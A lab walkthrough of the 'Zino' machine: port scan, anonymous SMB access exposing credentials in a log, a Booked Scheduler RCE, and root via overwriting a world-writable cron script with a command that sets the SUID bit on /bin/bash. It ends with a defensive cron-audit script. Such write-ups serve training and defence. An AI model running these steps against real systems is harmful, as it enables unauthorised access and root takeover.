# Zino

```
$ nmap -p- --min-rate 3000 -Pn 192.168.157.64 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 09:52 +08
Nmap scan report for 192.168.157.64
Host is up (0.17s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
8003/tcp open  mcreport
```

### FTP + SMB Enumeration

FTP doesn't allow for anonymous logins, but SMB does have shares we can read.

```
$ smbmap -H 192.168.157.64         
[+] IP: 192.168.157.64:445      Name: 192.168.157.64                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        zino                                                    READ ONLY       Logs
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.5-Debian)
```

We can log in to `zino` without a password:

```
$ smbclient //192.168.157.64/zino                                             
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jul 10 03:11:49 2020
  ..                                  D        0  Tue Apr 28 21:38:53 2020
  .bash_history                       H        0  Tue Apr 28 23:35:28 2020
  error.log                           N      265  Tue Apr 28 22:07:32 2020
  .bash_logout                        H      220  Tue Apr 28 21:38:53 2020
  local.txt                           N       33  Sun Jul 16 09:51:53 2023
  .bashrc                             H     3526  Tue Apr 28 21:38:53 2020
  .gnupg                             DH        0  Tue Apr 28 22:17:02 2020
  .profile                            H      807  Tue Apr 28 21:38:53 2020
  misc.log                            N      424  Tue Apr 28 22:08:15 2020
  auth.log                            N      368  Tue Apr 28 22:07:54 2020
  access.log                          N     5464  Tue Apr 28 22:07:09 2020
  ftp                                 D        0  Tue Apr 28 22:12:56 2020

                7158264 blocks of size 1024. 4725468 blocks available
```

The `misc.log` contained credentials for some software:

```
$ cat misc.log  
Apr 28 08:39:01 zino systemd[1]: Starting Clean php session files...
Apr 28 08:39:01 zino CRON[2791]: (CRON) info (No MTA installed, discarding output)
Apr 28 08:39:01 zino systemd[1]: phpsessionclean.service: Succeeded.
Apr 28 08:39:01 zino systemd[1]: Started Clean php session files.
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"
```

### Booked RCE

The only web port was port 8003, and it led us to this login page:

<figure><img src="/files/bEo6UYSYeYwv2Gv420g3" alt=""><figcaption></figcaption></figure>

There are some exploits for this:

```
$ searchsploit booked            
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metaspl | php/webapps/46486.rb
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (A | php/webapps/50594.py
Booked Scheduler 2.7.7 - Authenticated Directory Traversal | php/webapps/48428.txt
----------------------------------------------------------- ---------------------------------
```

We can use the credentials we got earlier with one of these exploits to get RCE:

<figure><img src="/files/sIY8WjXmGVJ19upREDIZ" alt=""><figcaption></figcaption></figure>

We can then get a reverse shell through `nc`:

<figure><img src="/files/IPxVhc3O7AHtqxzQ4BPc" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Cronjob Exploit -> Root

I downloaded `linpeas.sh` onto the machine and ran a scan. It found a cronjob we could hijack:

<figure><img src="/files/lGtY4rWew6s0NLSyYfuX" alt=""><figcaption></figcaption></figure>

We can write to this file:

```
www-data@zino:/tmp$ ls -la /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 164 Apr 28  2020 /var/www/html/booked/cleanup.py
```

Here's the script contents:

```
www-data@zino:/home/peter$ cat /var/www/html/booked/cleanup.py 
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /var/www/html/booked/uploads/reservation/* ')
except:
        print 'ERROR...'
sys.exit(0)
```

Since the script calls `sys.exit(0)` at the end, anything we append after it would never run. Instead, we can simply overwrite `cleanup.py` in that directory with a file of our own:

```bash
echo 'import os;os.system("chmod u+s /bin/bash")' > cleanup.py
```

Then we can just wait for a bit for the script to execute.

<figure><img src="/files/Lw2315wK8syqvVC7pGuC" alt=""><figcaption></figcaption></figure>
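The weakness here is a root-run cron job whose target is writable by a low-privileged user. As an added example (not code from the original writeup), the POSIX sh audit below checks cron targets for that condition: it flags any target (or its parent directory) that is group- or world-writable, or owned by someone other than the user the job runs as. It assumes only the standard `/etc/crontab` field layout and `ls -ldL` output.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit what cron executes,
# flagging the weakness abused on Zino, where a root-run job executed
# /var/www/html/booked/cleanup.py, a file that was world-writable and
# owned by www-data, so anyone with a www-data shell could replace it.

# mode_and_owner PATH -> "<10-char mode string> <owner>", e.g. "-rwxrwxrwx www-data"
mode_and_owner() {
    ls -ldL "$1" | awk '{print substr($1, 1, 10), $3}'   # -L: follow symlinks
}

# check_cron_target PATH [RUNAS]
# Returns 0 when only RUNAS (default root) can change what cron runs,
# 1 when the file, or the directory it lives in, can be altered by others.
check_cron_target() {
    path=$1
    runas=${2:-root}
    rc=0
    if [ ! -e "$path" ]; then
        echo "MISSING        $path (cron target does not exist)"
        return 1
    fi
    for p in "$path" "$(dirname "$path")"; do
        set -- $(mode_and_owner "$p")
        modestr=$1; owner=$2
        case $modestr in
            ????????w?) echo "WORLD-WRITABLE $p ($modestr)"; rc=1 ;;
            ?????w????) echo "GROUP-WRITABLE $p ($modestr)"; rc=1 ;;
        esac
        if [ "$owner" != "$runas" ]; then
            echo "OWNER-MISMATCH $p is owned by $owner but runs as $runas"
            rc=1
        fi
    done
    return $rc
}

# audit_crontab: reads /etc/crontab-style lines from stdin
# (min hour dom mon dow user command) and checks every absolute path in each
# command, interpreter and script alike. @reboot-style lines are not handled.
audit_crontab() {
    bad=0
    while read -r m h dom mon dow user cmd; do
        case $m in ''|\#*|*=*) continue ;; esac   # blank, comment, VAR=value
        for tok in $cmd; do
            case $tok in /*) check_cron_target "$tok" "$user" || bad=1 ;; esac
        done
    done
    return $bad
}
```

Run it as `audit_crontab < /etc/crontab` (and again for each file in `/etc/cron.d`); a clean system prints nothing and exits 0.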
